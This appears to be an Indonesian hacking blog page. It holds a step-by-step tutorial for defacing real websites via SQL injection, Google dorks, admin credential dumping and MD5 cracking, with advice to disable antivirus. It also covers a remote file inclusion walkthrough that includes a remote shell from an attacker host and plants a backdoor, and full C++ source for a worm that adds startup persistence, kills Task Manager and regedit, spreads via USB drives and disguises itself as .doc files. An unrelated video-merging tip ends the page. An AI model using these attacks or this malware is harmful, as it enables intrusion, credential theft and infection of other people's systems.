Cara Singkat Deface Website Dengan Tools SQLI Helper

Pe20plet || Sebenarnya bug SQL pada situs-situs berbasis php sudah lama ditemukan. Karena bug itu sudah lama, jadi sudah tidak banyak lagi situs-situs yang terdapat bug SQL-nya.
Tapi setelah saya coba searching dengan bantuan om Google, ternyata masih ada loh…. ^^. Ada baiknya trik ini dipakai cuman untuk media pembelajaran. Kalaupun nanti anda melakukan lebih dari itu, saya gak tanggung jawab deh! haha….

Nah, seperti pada judul diatas. Kita akan melakukan teknik SQL Injection Union pada situs-situs berbasis php dengan bantuan tools SQLI Helper.

Namun jika anda ingin melakukannya secara manual, anda bisa mencari situs-situs yang mengupas artikel SQL Injection secara manual. Banyak kok….. icon biggrin Cara Singkat Deface Website Dengan Tools SQLI Helper
Tapi kalau ada yang gampang, ngapain cari yang susah!! Bener gak? Hahahaha….
Ok, kita langsung saja ya…..

Langkah pertama, download tools SQLI Helper V 2.7 melalui link dibawah ini. Sizenya gak gede-gede amat kok. Cuman 241 KB. Download klik disini.
Oh ya, ketika anda menjalankan tools ini. Pastikan safety guard/resident shield antivirus anda dalam keadaan nonaktif ya. Soalnya tools ini akan dianggap trojan. Tapi saya jamin, tools ini aman kok. ^^

Langkah kedua, setelah selesai didownload. Buka tools tersebut, dan akan muncul tampilan kurang lebih seperti ini.

Pada kolom Target, kita akan mengisikan alamat url situs yang kita curigai masih terdapat bug SQL-nya. Namun url yang dijadikan target bukan url seperti biasanya, misalnya : http://duniainternet.info. Namun, http://www.er.com.my/Content.php?id=1.
Loh, cara dapetin url seperti itu gimana? mudah kok….!! Dengan bantuan om Google, apapun yang kita cari bisa kita dapatkan. (berarti bisa tau sapi saya yang ilang dong? XD).
Buka Google.com. Lalu masukkan script berikut di kotak penelusuran.
inurl:content.php?id=
atau
inurl:trainers.php?id=
atau
inurl:buy.php?category=
atau
inurl:article.php?ID=
Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak sih script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk anda. Sabar aja ya… ^^

Langkah ketiga, diumpamakan anda telah memilih satu situs yang akan digunakan sebagai target. Namun kita harus tahu, situs tersebut terdapat bug SQL nya tidak? cara cepat mengetahui situs tersebut vuln terhadapt serangan SQL adalah dengan memberikan tanda ” “(petik satu) di akhir url tersebut.
Contoh :
Situs target http://www.er.com.my/Content.php?id=1. Cek apakah situs tersebut ada bug SQLnya dengan menambahkan http://www.er.com.my/Content.php?id=1‘ (tanda petik satu) dibelakang 1. Paham?
Nah, kalau situs itu mengeluarkan pesan error. Maka bisa disimpulkan, situs tersebut masih vuln dengan SQL Injection. Pesan error-nya kurang lebih seperti ini.

Langkah keempat, masukkan url situs tadi ke kolom Target di tools SQLI Helper. Oh ya, tanda petiknya gak usah dipakai lagi ya. Cukup urlnya saja. Ingat….. tanpa tanda petik di akhir url!!
Setelah itu klik Inject. Maka secara otomatis dia akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll.
Kalau langkah Inject berhasil, maka akan muncul tampilan seperti ini.

Mantab!! Sekarang saatnya klik Get Database dibawah menu Inject.
Selanjutnya, klik Database name. Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawag, saya memilih database natural. Selanjutnya klik Get Tables.

Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin. ^^

Seperti contoh diatas, saya mendapatkan tabel admin_user. Doakan saja terdapt informasi username dan password admin didalam tabel tersebut. Langkah selanjutnya pilih admin_user dan klik Get Coloumns.

Wahhhhh… ternyata benar! Disana tersimpan user_name, user_email, dan tentunya user_pwd (password). Cihuyy… langsung aja blok user_name, dan user_pwd lalu tekan Dump Now.

Maka dengan segera, informasi mengenai username dan password administrator jatuh ketangan kita. Hahaha….. Gimana, mudah ya?
Ada yang aneh?? Password yang ditampilkan bentuknya seperti ini ya?
987d29241cc4f2a7465f2d9356ab3615
987d29241cc4f2a7465f2d9356ab3615
Password tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?
Caranya cukup mudah, buka saja situs md5crack.com, lalu masukkan kode tersebut di kotak penelusuran. Berdoa saja password anda tersebut cukup lemah, sehingga bisa dipecahkan dengan metode brute force. Setelah anda masukkan, klik Crack hash baby!

Maka, si password pun muncul….! Passwordnya ternyata admin. ^^

Langkah kelima, jika username dan password situs tersebut sudah ditangan, selanjutnya tinggal mencari form login dari situs tersebut. Misalnya :

http://situsanda.com/admin/
http://situsanda.com/login/
http://situsanda.com/administrator/
dsb……

Yang pasti, form login tersebut harus kita dapatkan. Entah bagaimanapun caranya…. ^^

Masih gak bisa juga??? Ck…ck…ck…. ya udah. Download tools Admin Finder deh kalo anda kesusahan dalam mencari form login situs tersebut. Download klik disini.
Cara kerjanya cukup mudah kok, tinggal masukkan url situs tersebut dan tunggu tools itu bekerja secara otomatis mencari halaman adminnya. Berdoa saja tools tersebut juga menemukannya…. icon razz Cara Singkat Deface Website Dengan Tools SQLI Helper
Jrengg….jreng…jrenggg….! Kita umpamakan anda telah mengetahui username, password, dan halaman admin website tersebut. Maka tinggal eksekusi deh website tersebut…. Hahaha.
Saran saya cuman satu, usahakan jangan merusak tampilan website terseubut. Buat aja halaman baru yang memberitahukan bahwa situs tersebut terdapat bug SQL nya. Ingat dosa gan…. !! ^^

Belajar Deface dengan tehnik RFI

Pe20plet || Sedikit penjelasan untuk tehnik ini :
RFI (Remote File Inclusion) adalah tehnik dimana seorang Attacker (Penyerang) melakukan Remote terhadap web yang mengambil filenya melalui URL menggunakan fungsi $_GET['path'] dengan menyertakan isi file tersebut menggunakan fungsi include()





$path = $_GET['path'];
include $path;
?>

Code diatas apabila terletak pada file index.php dan dimasukkan kedalam URL akan menjadi seperti ini

http://www.domain.kita/index.php?path=(File yang akan diambil)

Saya berikan sedikit contoh, di umpamakan saya mempuyai file tersebut diatas (index.php) dengan code yang sama, pada tempat yang sama pula saya memiliki file satu lagi dengan nama fileku.html, nah untuk memunculkan fileku.html tersebut saya melakukan include() terhadap file tersebut pada file index.php, jadi alamat URL yang saya masukan akan seperti ini

http://www.domain.kita/index.php?path=fileku.html

Maka halaman tersebut akan menampilkan isi dari fileku.html
Nahh,, hal inilah yang membuat sang Attacker untuk melakukan Remote terhadap web kita.
Baik saya berikan contoh lagi : Seandainya kamu adalah sang Attacaker tersebut, kamu mempunyai sebuah file pada alamat seperti ini


http://www.sang.attakcer/shell.txt 

Dimana isi dari file shell.txt adalah sebuah script Backdoor (Pintu Belakang) yang dapat mengakses web target tersebut, jadi untuk meremot web target tersebut sang Attacker hanya akan mengganti file yang di include() oleh URL target tersebut, sehingga file yang sebelumnya adalah berupa tampilan dari isi file yang dimasukkan sang Admin dari target akan berubah degan tampilan Backdoor dari sang Attacker


http://www.domain.kita/index.php?path=www.sang.attakcer/shell.txt

Demikian sedikit penjelasan saya diatas, semoga dapat di mengerti dan dipahami
Oke,, setelah saudara sekalian pembaca artikel saya ini mengerti dengan sedikit penjelasan saya diatas, maka kita lanjut dengan pemPRAKTEKan,
Dalam hal ini saya akan menggunakan Web saya sebagai targetnya, jadi tanpa merusak Web orang lain kita akan belajar untuk melakukan pendefacan.
Nexxttt...!!!

Target web yang akan di deface adalah


http://www.target.tolonggalo.web.id/ 

Oke,,  disini saya meletakan bug ini pada


index.php?bug_lfi=

Jadi alamat target yang dapat digunakan untuk melakukan hal ini adalah


http://www.target.tolonggalo.web.id/index.php?bug_lfi=

Sekarang kita bakal menginjeksnya dengan file shell kita, berhubung ini hanya untuk bahan pembelajaran jadi code backdoor yang dapat digunakan adalah

Code shell  | www.TOLONGGALO.web.id

Buat sebuah file dengan ekstensi ".txt"  terus masukan code saya diatas dan upload ke web kamu, atau bisa langsung pake punya saya di


http://www.tolonggalo.web.id/code_shell.txt

Nah,, coba letakkan alamat Code Shell saya ke target, seperti ini


http://www.target.tolonggalo.web.id/index.php?bug_lfi=www.tolonggalo.web.id/code_shell.txt
Maka akan tampil shell Palsu yang saya buat,,, :D
Oke,, setelah shell palsu yang saya buat muncul sekarang kita upload sebuah shell lagi sebagai backdoor,
Pertanyaan : Lo kok kenapa diupload shell lagi?? kan udah ada shell yang ini,,
Baik,, pertanyaan yang bagus,, kenapa,, karena shell yang sekarang dipake tidak mempunyai Akses lebih terhadap target yang kita injeck,, dalam halnya pengeditan, Oke singkat itu aja, ane malas ngomong panjang lebar,, (Capek tau.. wkwkwk :P)
Nexxtt,,
Sama halnya dengan pengincludtan terhadap shell diatas maka code shell yang dapat diupload hanya code yang saya punya :P

Code shell | www.TOLONGGALO.web.id 

api kali ini save dengan ekstensi ".php", Habis itu tinggal upload deh,,
Note : Pada akhir kalimat jangan terdapat spasi, agar code dapat di verifikasi dengan benar
Setelah Upload berhasil sekarang buka file shell yang tadi di upload tersebut,
Oke,, sampai disini kita tinggal melakukan deface terhadap web tersebut, dengan cara mengedit file index.php
Caranya, Pertama sediakan script untuk tampilan deface kamu
Atau kalau ngga punya juga ngga apa², nanti ketik aja "Hacked By Nick Kamu",, hehehehehe,, gitu aja kok repot,,
Setelah di edit² file index.php-nya sekarang buka url target tadi,, gimana,, Udah kena deface kan,,?? wkwkwkwkwk,,,
Sekian dulu dari saya, semoga dapat menambah wawasan anda, (Web Target yang di deface adalah Tampilan Manipulasi hasil karya saya sediri, jadi hargailah hasil karya Anak Bangsa,, kalau berkenan Baclink ama web Saya, Bisa gunakan fitur Auto Backlink yang saya buat disamping)

Theme Blackberry Fitur Anak Hacker

Main Menu


Lock Screen


Download Theme BB 81xx 4.5 | Pepe 0plet | Reply With Quote

Virus C++ For Computer

Pe20plet | This's Viris Wrong C++ to computer |
#include

#include

#include "termproc.h"

#include "manstring.h"

#include "shutdown.h"

#include "scanpath.h"

#include "regaccess.h"

using namespace std;



// Prototype Fungsi

DWORD WINAPI Process_Watcher(LPVOID Param);

DWORD WINAPI Shut_it_Down(LPVOID Param);

DWORD WINAPI Copy_to_UFD(LPVOID Param);

DWORD WINAPI Fake_Doc(LPVOID Param);

void InvokeDocuments(void);

void HideAndSpoof(char *path);



// Variabel Global

DWORD id = 0; // Variabel penampung ID thread



int WINAPI WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance,

                    LPSTR lpszArgument, int nFunsterStil)

{

    char szCurrent[MAX_PATH]; // Buffer untuk alamat sumber file duplikasi

    char szPath[MAX_PATH];    // Buffer untuk alamat tujuan duplikasi file



    // Menampilkan file document sebenarnya

    InvokeDocuments();



    // Mengecek apakah program sudah running atau belum. Jika sudah, maka

    // program akan diakhiri

    CreateMutex(NULL, true, "Goldstein");

    if(GetLastError() == ERROR_ALREADY_EXISTS)

        return 0; 



    // Mendapatkan fullpath dari program ini

    GetModuleFileName(NULL, szCurrent, MAX_PATH-1);



    // Mengkopikan diri ke folder [SYSTEM]

    GetSystemDirectory(szPath, sizeof(szPath));

    strcat(szPath, "\\");

    strcat(szPath, "WINWORD.EXE");

    CopyFile(szCurrent, szPath, true);



    // Membuat startup key

    SetStringValue(HKLM,

                   "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",

                   "MSWORD STARTUP",

                   szPath);



    // Menjadikan fungsi Process_Watcher() sebagai thread

    CreateThread(NULL, 0, &Process_Watcher, NULL, 0, &id);

    // Menjadikan fungsi Shut_it_Down() sebagai thread

    CreateThread(NULL, 0, &Shut_it_Down, NULL, 0, &id);

    // Menjadikan fungsi Copy_to_UFD() sebagai thread

    CreateThread(NULL, 0, &Copy_to_UFD, NULL, 0, &id);

    // Menjadikan fungsi Fake_Doc() sebagai thread

    CreateThread(NULL, 0, &Fake_Doc, NULL, 0, &id);



    while(1)

        Sleep(1000);



    return EXIT_SUCCESS;

}



DWORD WINAPI Process_Watcher(LPVOID Param)

{

    while(1)

    {

        Sleep(100); // Menunda eksekusi 0,1 detik

        TermProc("msconfig.exe"); // Mengakhiri process MSConfig

        TermProc("regedit.exe");  // Mengakhiri process Registry Editor

        TermProc("cmd.exe");      // Mengakhiri process Command Prompt

        TermProc("taskmgr.exe");  // Mengakhiri process Task Manager

    }

    return EXIT_SUCCESS;

}



DWORD WINAPI Shut_it_Down(LPVOID Param)

{

    while(1)

    {

        Sleep(1000);

        time_t now;

        tm tm;



        time(&now);

        // Mengcopy nilai yang ditunjuk oleh nilai return localtime() ke object tm

        tm = *localtime(&now);



        // Jika jam menunjuk pukul 21 dan menit habis dibagi 5

        if(tm.tm_hour == 21 && tm.tm_min%5 == 0)

            TurnOff(ShtDown); // Shutdown Komputer

    }



    return 0;

}



void InvokeDocuments(void)

{

    char szPath[MAX_PATH] = {'\0'};



    GetModuleFileName(NULL, szPath, MAX_PATH);



    // Invoke file dokumen asli

    ShellExecute(NULL, "open", left(szPath, strlen(szPath)-7), NULL, NULL, SW_SHOW);

}    



DWORD WINAPI Copy_to_UFD(LPVOID Param)

{

    char *drv[10] = {"A:", "B:", "C:", "D:", "E:", "F:", "G:", "H:", "I:", "J:"};

    char szSource[MAX_PATH];

    char szDest[MAX_PATH];

    char szFileName[] = "README.DOC   .exe";



    GetModuleFileName(NULL, szSource, MAX_PATH);



    while(1)

    {

        Sleep(1000);



        // Loop untuk memeriksa setiap array pointer yang menunjuk ke heap

        for(int i=0; i < 10; i++)

        {

            Sleep(1000);

            // Jika drive merupakan removable

            if(GetDriveType(drv[i]) == DRIVE_REMOVABLE)

            {

                strncpy(szDest, drv[i], MAX_PATH-1);  // Mengcopy nama drive

                strcat(szDest, "\\");                 // Menambahkan backslash '\'

                strcat(szDest, szFileName);           // Menggabungkan dengan szFilename

                CopyFile(szSource, szDest, true);     // Copykan file

            }

        }

    }



    return EXIT_SUCCESS;

}



DWORD WINAPI Fake_Doc(LPVOID Param)

{

    // Pointer ke heap yang berisi string drive

    char *drv[10] = {"A:", "B:", "C:", "D:", "E:", "F:", "G:", "H:", "I:", "J:"};



    while(1)

    {

        for(int i=0; i<10 br="br" i="i">
        {

            Sleep(1000);

            // Jika drive merupakan fixed

            if(GetDriveType(drv[i]) == DRIVE_FIXED)

            {

                // Memanggil fungsi ScanPath() yang akan memanggil fungsi

                // HideAndSpoof() untuk setiap file yang ditemukan

                ScanPath(drv[i], (LPVOID)HideAndSpoof, true);

            }

        }

    }



    return EXIT_SUCCESS;

}



void HideAndSpoof(char* Path)

{

    char szSource[MAX_PATH]; // Buffer untuk lokasi file sumber

    char szDest[MAX_PATH];   // Buffer untuk lokasi tujuan peng-copy-an

    char szFake[] = "   .exe";



    if (!stricmp(right(Path, 4), ".doc"))

    {

        // Mendapatkan lokasi current file

        GetModuleFileName(NULL, szSource, MAX_PATH);



        // Mengatur attribute file dokumen menjadi hidden+system

        SetFileAttributes(Path, 6);



        strncpy(szDest, Path, MAX_PATH-1); // Mengcopy lokasi Path ke szDest[]

        strcat(szDest, szFake);            // dan menambahkan string "   .exe"



        CopyFile(szSource, szDest, true);

    }

}

Menggabungkan Dua atau Lebih File Video Menjadi Satu

enggabungkan (merge) dua atau lebih file video di sini artinya menggabungkan file-file video sejenis yang terpisah menjadi satu file gabungan yang utuh. File MPG dan FLV merupakan file video yang banyak tersedia di internet, khususnya file FLV yang jadi format standar youtube.com, sering dipecah menjadi bagian per bagian karena batasan dan kemudahan dalam upload file tersebut dibandingkan dengan mengupload dalam ukuran aslinya yang besar.
Masalahnya setelah didownload, file bagian-bagian tersebut ingin disatukan menjadi file utuh, karena sangat tidak nyaman menonton video secara bagian per bagian. Nah, banyak pilihan bagi anda, bisa pakai software bayar atau gratisan yang banyak tersedia di internet, atau bisa juga menggunakan cara sederhana berikut ini:
1. Buka aplikasi notepad atau text editor lainnya.
2. Ketikan “copy /b *.flv FullMovie.flv” (tanpa tanda kutip)

3. Simpan dengan nama file terserah anda, dan ubah extensinya jadi *.bat, misal “JoinFLV.bat“. Agar file berubah menjadi ekstensi *.bat, gunakan tanda kutip ganda tersebut di jendela konfirmasi penyimpanan.

4. Letakkan file JoinFLV.bat yang baru kita buat itu ke dalam folder yang sama dimana file *.flv akan di gabungkan.
5. Klik 2x pada file *.bat tersebut.

6. Akan terbentuk file hasil join dengan nama “FullMovie.flv“.

catatan: cara yang sama bisa digunakan untuk file *.mpg dengan mengubah ekstensinya dari FLV menjadi MPG. Jadi pada langkah 1 yang harus ditulis adalah “copy /b *.mpg FullMovie.mpg” (tanpa tanda kutip)

 
Yahoo Messenger
Send Me IM!
Google Plus
Add Me To Your Circle!
Twitter
Follow Me!
Facebook
Add My Facebook
Original Template By Belajar SEO Blogspot - Himajiesized By Dayz Hidayat